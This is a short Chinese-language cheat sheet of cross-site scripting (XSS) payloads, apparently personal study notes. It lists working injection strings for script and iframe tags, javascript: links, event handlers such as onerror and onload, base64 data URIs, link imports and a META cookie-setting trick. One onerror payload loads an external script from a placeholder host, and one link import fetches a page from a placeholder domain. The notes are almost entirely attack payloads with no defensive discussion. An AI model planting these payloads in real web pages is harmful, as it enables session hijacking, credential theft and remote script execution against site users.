XSS笔记

XSS标签利用

  • <script><iframe>

这些标签可以直接执行javascript代码

  • javascript的伪协议

<a>,<iframe>

<iframe src="javascript:alert(xss);"></iframe> 
<a href="javascript:alert(xss);">xss</a>
  • 利用html事件(dom的事件有100多种)

onload,onclick,onerror,onmousemove,onmouseover

<img src="xxx.png" onload="alert('xss')" /> //需要加载成功
<a onclick="alert('xss')"></a>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://xxx/xxx.js';>
  • Data URI 协议(IE不可用)

<a>,<object>,<meta>

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=">test</a>  
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
<meta HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" />

  • link的href

    <link rel="import" href="https://www.xxx.com/xss"></link> //一个xss页面就行
  • 其他

设置cookie:

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">